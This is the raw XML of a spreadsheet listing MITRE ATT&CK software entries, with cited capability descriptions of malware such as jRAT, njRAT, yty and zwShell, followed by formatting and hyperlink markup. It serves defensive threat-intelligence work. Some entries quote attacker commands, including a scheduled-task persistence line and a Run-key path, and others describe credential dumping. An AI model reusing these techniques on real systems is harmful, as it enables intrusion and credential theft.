  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) has gathered system architecture, processor, OS configuration, and installed hardware information.(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) can create a new service to establish persistence.(Citation: Nccgroup Gh0st April 2018)(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>[gsecdump](https://attack.mitre.org/software/S0008) can dump LSA secrets.(Citation: TrueSec Gsecdump)</t>
  </si>
  <si>
    <t>[gsecdump](https://attack.mitre.org/software/S0008) can dump Windows password hashes from the SAM.(Citation: TrueSec Gsecdump)</t>
  </si>
  <si>
    <t>[hcdLoader](https://attack.mitre.org/software/S0071) provides command-line access to the compromised system.(Citation: Dell Lateral Movement)</t>
  </si>
  <si>
    <t>[hcdLoader](https://attack.mitre.org/software/S0071) installs itself as a service for persistence.(Citation: Dell Lateral Movement)(Citation: ThreatStream Evasion Analysis)</t>
  </si>
  <si>
    <t>[httpclient](https://attack.mitre.org/software/S0068) encrypts C2 content with XOR using a single byte, 0x12.(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>[httpclient](https://attack.mitre.org/software/S0068) uses HTTP for command and control.(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>[httpclient](https://attack.mitre.org/software/S0068) opens cmd.exe on the victim.(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>[iKitten](https://attack.mitre.org/software/S0278) will zip up the /Library/Keychains directory before exfiltrating it.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[iKitten](https://attack.mitre.org/software/S0278) prompts the user for their credentials.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[iKitten](https://attack.mitre.org/software/S0278) saves itself with a leading "." so that it's hidden from users by default.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[iKitten](https://attack.mitre.org/software/S0278) collects the keychains on the system.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[iKitten](https://attack.mitre.org/software/S0278) lists the current processes running.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[iKitten](https://attack.mitre.org/software/S0278) adds an entry to the rc.common file for persistence.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[iKitten](https://attack.mitre.org/software/S0278) will look for the current IP address.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[ifconfig](https://attack.mitre.org/software/S0101) can be used to display adapter configuration on Unix systems, including information for TCP/IP, DNS, and DHCP.</t>
  </si>
  <si>
    <t>[ipconfig](https://attack.mitre.org/software/S0100) can be used to display adapter configuration on Windows systems, including information for TCP/IP, DNS, and DHCP.</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can capture microphone recordings.(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can capture clipboard data.(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can capture passwords from common chat applications such as MSN Messenger, AOL, Instant Messenger, and and Google Talk.(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can capture passwords from common web browsers such as Internet Explorer, Google Chrome, and Firefox.(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) has a function to delete files from the victim’s machine.(Citation: jRAT Symantec Aug 2018)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can browse file systems.(Citation: Kaspersky Adwind Feb 2016)(Citation: Symantec Frutas Feb 2013)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can download and execute files.(Citation: jRAT Symantec Aug 2018)(Citation: Kaspersky Adwind Feb 2016)(Citation: Symantec Frutas Feb 2013)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) has been distributed as HTA files with JScript.(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) has the capability to log keystrokes from the victim’s machine, both offline and online.(Citation: jRAT Symantec Aug 2018)(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283)’s Java payload is encrypted with AES.(Citation: jRAT Symantec Aug 2018) Additionally, backdoor files are encrypted using DES as a stream cipher. Later variants of [jRAT](https://attack.mitre.org/software/S0283) also incorporated AV evasion methods such as Java bytecode obfuscation via the commercial Allatori obfuscation tool.(Citation: Symantec Frutas Feb 2013)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can map UPnP ports.(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can steal keys for VPNs and cryptocurrency wallets.(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can query and kill system processes.(Citation: Symantec Frutas Feb 2013)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can serve as a SOCKS proxy server.(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can support RDP control.(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can be configured to reconnect at certain intervals.(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) has the capability to take screenshots of the victim’s machine.(Citation: jRAT Symantec Aug 2018)(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can list security software, such as by using WMIC to identify anti-virus products installed on the victim’s machine and to obtain firewall details.(Citation: jRAT Symantec Aug 2018)(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) payloads have been packed.(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>Startup Items</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can list and manage startup entries.(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) collects information about the OS (version, build type, install date) as well as system up-time upon receiving a connection from a backdoor.(Citation: Symantec Frutas Feb 2013)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can gather victim internal and external IPs.(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can list network connections.(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can list local services.(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) has the capability to capture video from a webcam.(Citation: jRAT Symantec Aug 2018)(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) has been distributed as HTA files with VBScript.(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) has command line access.(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) uses WMIC to identify anti-virus products installed on the victim’s machine and to obtain firewall details.(Citation: jRAT Symantec Aug 2018)</t>
  </si>
  <si>
    <t>Domain Fronting</t>
  </si>
  <si>
    <t>[meek](https://attack.mitre.org/software/S0175) uses Domain Fronting to disguise the destination of network traffic as another server that is hosted in the same Content Delivery Network (CDN) as the intended destination.</t>
  </si>
  <si>
    <t>[nbtstat](https://attack.mitre.org/software/S0102) can be used to discover local NetBIOS domain names.</t>
  </si>
  <si>
    <t>[nbtstat](https://attack.mitre.org/software/S0102) can be used to discover current NetBIOS sessions.</t>
  </si>
  <si>
    <t>[netsh](https://attack.mitre.org/software/S0108) can be used to disable local firewall settings.(Citation: TechNet Netsh)(Citation: TechNet Netsh Firewall)</t>
  </si>
  <si>
    <t>Netsh Helper DLL</t>
  </si>
  <si>
    <t>[netsh](https://attack.mitre.org/software/S0108) can be used as a persistence proxy technique to execute a helper DLL when netsh.exe is executed.(Citation: Demaske Netsh Persistence)</t>
  </si>
  <si>
    <t>[netsh](https://attack.mitre.org/software/S0108) can be used to set up a proxy tunnel to allow remote host access to an infected host.(Citation: Securelist fileless attacks Feb 2017)</t>
  </si>
  <si>
    <t>[netsh](https://attack.mitre.org/software/S0108) can be used to discover system firewall settings.(Citation: TechNet Netsh)(Citation: TechNet Netsh Firewall)</t>
  </si>
  <si>
    <t>[netstat](https://attack.mitre.org/software/S0104) can be used to enumerate local network connections, including active TCP connections and other network statistics.(Citation: TechNet Netstat)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) gathers information about opened windows during the initial infection.(Citation: Fidelis njRAT June 2013)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) has used AutoIt to compile the payload and main script into a single executable after delivery.(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) has a module that steals passwords saved in victim web browsers.(Citation: Fidelis njRAT June 2013)(Citation: Trend Micro njRAT 2018)(Citation: Citizen Lab Group5)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) can collect data from a local system.(Citation: Fidelis njRAT June 2013)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) has modified the Windows firewall to allow itself to communicate through the firewall.(Citation: Fidelis njRAT June 2013)(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) has used HTTP to receive stolen information from the infected machine.(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) has used a fast flux DNS for C2 IP resolution.(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) can browse file systems using a file manager module.(Citation: Fidelis njRAT June 2013)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) is capable of deleting objects related to itself (registry keys, files, and firewall rules) on the victim.(Citation: Fidelis njRAT June 2013)(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) can download files to the victim’s machine.(Citation: Fidelis njRAT June 2013)(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) is capable of logging keystrokes.(Citation: Fidelis njRAT June 2013)(Citation: Trend Micro njRAT 2018)(Citation: Citizen Lab Group5)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) can create, delete, or modify a specified Registry key or value.(Citation: Fidelis njRAT June 2013)(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) has used the ShellExecute() function within a script.(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) has used port 1177 for HTTP C2 communications.(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) has included a base64 encoded executable.(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) will attempt to detect if the victim system has a camera during the initial infection. [njRAT](https://attack.mitre.org/software/S0385) can also detect any removable drives connected to the system.(Citation: Fidelis njRAT June 2013)(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) has executed PowerShell commands via auto-run registry key persistence.(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) can search a list of running processes for Tr.exe.(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) can read specific registry values.(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) has added persistence via the Registry key &lt;code&gt;HKCU\Software\Microsoft\CurrentVersion\Run\&lt;/code&gt; and dropped a shortcut in &lt;code&gt;%STARTUP%&lt;/code&gt;.(Citation: Fidelis njRAT June 2013)(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) has a module for performing remote desktop access.(Citation: Fidelis njRAT June 2013)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) can identify remote hosts on connected networks.(Citation: Fidelis njRAT June 2013)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) can be configured to spread via removable drives.(Citation: Fidelis njRAT June 2013)(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) can capture screenshots of the victim’s machines.(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) uses Base64 encoding for C2 traffic.(Citation: Fidelis njRAT June 2013)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) enumerates the victim operating system and computer name during the initial infection.(Citation: Fidelis njRAT June 2013)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) enumerates the current user during the initial infection.(Citation: Fidelis njRAT June 2013)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) can access the victim's webcam.(Citation: Fidelis njRAT June 2013)(Citation: Citizen Lab Group5)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) has used HTTP for C2 communications.(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) can launch a command shell interface for executing commands.(Citation: Fidelis njRAT June 2013)</t>
  </si>
  <si>
    <t>If an initial connectivity check fails, [pngdowner](https://attack.mitre.org/software/S0067) attempts to extract proxy details and credentials from Windows Protected Storage and from the IE Credentials Store. This allows the adversary to use the proxy credentials for subsequent requests if they enable outbound HTTP access.(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>[pngdowner](https://attack.mitre.org/software/S0067) deletes content from C2 communications that was saved to the user's temporary directory.(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>[pngdowner](https://attack.mitre.org/software/S0067) uses HTTP for command and control.(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>[pwdump](https://attack.mitre.org/software/S0006) can be used to dump credentials from the SAM.(Citation: Wikipedia pwdump)</t>
  </si>
  <si>
    <t>[route](https://attack.mitre.org/software/S0103) can be used to discover routing configuration information.</t>
  </si>
  <si>
    <t>[schtasks](https://attack.mitre.org/software/S0111) is used to schedule tasks on a Windows system to run at a specific date and time.(Citation: TechNet Schtasks)</t>
  </si>
  <si>
    <t>Sharepoint</t>
  </si>
  <si>
    <t>[spwebmember](https://attack.mitre.org/software/S0227) is used to enumerate and dump information from Microsoft SharePoint.(Citation: NCC Group APT15 Alive and Strong)</t>
  </si>
  <si>
    <t>[sqlmap](https://attack.mitre.org/software/S0225) can be used to automate exploitation of SQL injection vulnerabilities.(Citation: sqlmap Introduction)</t>
  </si>
  <si>
    <t>[xCmd](https://attack.mitre.org/software/S0123) can be used to execute binaries on remote systems by creating and starting a service.(Citation: xCmd)</t>
  </si>
  <si>
    <t>[yty](https://attack.mitre.org/software/S0248) communicates to the C2 server by retrieving a Google Doc.(Citation: ASERT Donot March 2018)</t>
  </si>
  <si>
    <t>[yty](https://attack.mitre.org/software/S0248) contains junk code in its binary, likely to confuse malware analysts.(Citation: ASERT Donot March 2018)</t>
  </si>
  <si>
    <t>[yty](https://attack.mitre.org/software/S0248) collects files with the following extensions: .ppt, .pptx, .pdf, .doc, .docx, .xls, .xlsx, .docm, .rtf, .inp, .xlsm, .csv, .odt, .pps, .vcf and sends them back to the C2 server.(Citation: ASERT Donot March 2018)</t>
  </si>
  <si>
    <t>[yty](https://attack.mitre.org/software/S0248) gathers information on victim’s drives and has a plugin for document listing.(Citation: ASERT Donot March 2018)</t>
  </si>
  <si>
    <t>[yty](https://attack.mitre.org/software/S0248) uses a keylogger plugin to gather keystrokes.(Citation: ASERT Donot March 2018)</t>
  </si>
  <si>
    <t>[yty](https://attack.mitre.org/software/S0248) gets an output of running processes using the &lt;code&gt;tasklist&lt;/code&gt; command.(Citation: ASERT Donot March 2018)</t>
  </si>
  <si>
    <t>[yty](https://attack.mitre.org/software/S0248) uses the &lt;code&gt;net view&lt;/code&gt; command for discovery.(Citation: ASERT Donot March 2018)</t>
  </si>
  <si>
    <t>[yty](https://attack.mitre.org/software/S0248) establishes persistence by creating a scheduled task with the command &lt;code&gt;SchTasks /Create /SC DAILY /TN BigData /TR “ + path_file + “/ST 09:30“&lt;/code&gt;.(Citation: ASERT Donot March 2018)</t>
  </si>
  <si>
    <t>[yty](https://attack.mitre.org/software/S0248) collects screenshots of the victim machine.(Citation: ASERT Donot March 2018)</t>
  </si>
  <si>
    <t>[yty](https://attack.mitre.org/software/S0248) packs a plugin with UPX.(Citation: ASERT Donot March 2018)</t>
  </si>
  <si>
    <t>[yty](https://attack.mitre.org/software/S0248) has some basic anti-sandbox detection that tries to detect Virtual PC, Sandboxie, and VMware. (Citation: ASERT Donot March 2018)</t>
  </si>
  <si>
    <t>[yty](https://attack.mitre.org/software/S0248) gathers the computer name, the serial number of the main disk volume, CPU information, Microsoft Windows version, and runs the command &lt;code&gt;systeminfo&lt;/code&gt;.(Citation: ASERT Donot March 2018)</t>
  </si>
  <si>
    <t>[yty](https://attack.mitre.org/software/S0248) runs &lt;code&gt;ipconfig /all&lt;/code&gt; and collects the domain name.(Citation: ASERT Donot March 2018)</t>
  </si>
  <si>
    <t>[yty](https://attack.mitre.org/software/S0248) collects the victim’s username.(Citation: ASERT Donot March 2018)</t>
  </si>
  <si>
    <t>[zwShell](https://attack.mitre.org/software/S0350) has deleted itself after creating a service as well as deleted a temporary file when the system reboots.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>[zwShell](https://attack.mitre.org/software/S0350) can browse the file system.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>[zwShell](https://attack.mitre.org/software/S0350) can modify the Registry.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>[zwShell](https://attack.mitre.org/software/S0350) has used RDP for lateral movement.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>[zwShell](https://attack.mitre.org/software/S0350) has been copied over network shares to move laterally.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>[zwShell](https://attack.mitre.org/software/S0350) has used SchTasks for execution.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>[zwShell](https://attack.mitre.org/software/S0350) can obtain the victim PC name and OS version.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>[zwShell](https://attack.mitre.org/software/S0350) can obtain the victim IP address.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>[zwShell](https://attack.mitre.org/software/S0350) can obtain the name of the logged-in user on the victim.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>[zwShell](https://attack.mitre.org/software/S0350) can launch command-line shells.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>[zwShell](https://attack.mitre.org/software/S0350) has established persistence by adding itself as a new service.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>Summe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</si>
</sst>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2"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <u/>
      <sz val="12"/>
      <color theme="10"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <name val="Calibri"/>
      <family val="2"/>
    </font>
  </fonts>
  <fills count="2">
    <fill>
      <patternFill patternType="none"/>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right style="thin">
        <color indexed="64"/>
      </right>
      <top style="thin">
        <color indexed="64"/>
      </top>
      <bottom style="thin">
        <color indexed="64"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color auto="1"/>
      </left>
      <right style="thin">
        <color auto="1"/>
      </right>
      <top style="thin">
        <color auto="1"/>
      </top>
      <bottom style="thin">
        <color auto="1"/>
      </bottom>
      <diagonal/>
    </border>
  </borders>
  <cellStyleXfs count="2">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0"/>
  </cellStyleXfs>
  <cellXfs count="7">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="1"/>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="2" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="3" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
  </cellXfs>
  <cellStyles count="2">
    <cellStyle name="Link" xfId="1" builtinId="8"/>
    <cellStyle name="Standard" xfId="0" builtinId="0"/>
  </cellStyles>
  <dxfs count="3">
    <dxf>
      <font>
        <color rgb="FF006100"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFC6EFCE"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color rgb="FF006100"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFC6EFCE"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color rgb="FF006100"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFC6EFCE"/>
        </patternFill>
      </fill>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tyles" Target="styles.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/worksheet" Target="worksheets/sheet3.xml"/><Relationship Id="rId7"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9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/sharedStrings" Target="sharedStrings.xml"/></Relationships>
</file>

<file path=xl/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Offic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17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0363" TargetMode="External"/><Relationship Id="rId299" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0048" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0128" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0030" TargetMode="External"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0037" TargetMode="External"/><Relationship Id="rId324" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0055" TargetMode="External"/><Relationship Id="rId366" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0217" TargetMode="External"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0499" TargetMode="External"/><Relationship Id="rId226" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0233" TargetMode="External"/><Relationship Id="rId433" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0442" TargetMode="External"/><Relationship Id="rId268" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0138" TargetMode="External"/><Relationship Id="rId475" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0068" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0043" TargetMode="External"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0154" TargetMode="External"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0173" TargetMode="External"/><Relationship Id="rId335" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0565" TargetMode="External"/><Relationship Id="rId377" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0464" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0073" TargetMode="External"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0189" TargetMode="External"/><Relationship Id="rId237" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0179" TargetMode="External"/><Relationship Id="rId402" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0242" TargetMode="External"/><Relationship Id="rId279" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0594" TargetMode="External"/><Relationship Id="rId444" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0514" TargetMode="External"/><Relationship Id="rId486" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0006" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0089" TargetMode="External"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0193" TargetMode="External"/><Relationship Id="rId290" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0371" TargetMode="External"/><Relationship Id="rId304" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0428" TargetMode="External"/><Relationship Id="rId346" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0166" TargetMode="External"/><Relationship Id="rId388" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0589" TargetMode="External"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0115" TargetMode="External"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0588" TargetMode="External"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0201" TargetMode="External"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0599" TargetMode="External"/><Relationship Id="rId413" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0263" TargetMode="External"/><Relationship Id="rId248" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0284" TargetMode="External"/><Relationship Id="rId455" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0117" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0099" TargetMode="External"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0024" TargetMode="External"/><Relationship Id="rId315" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 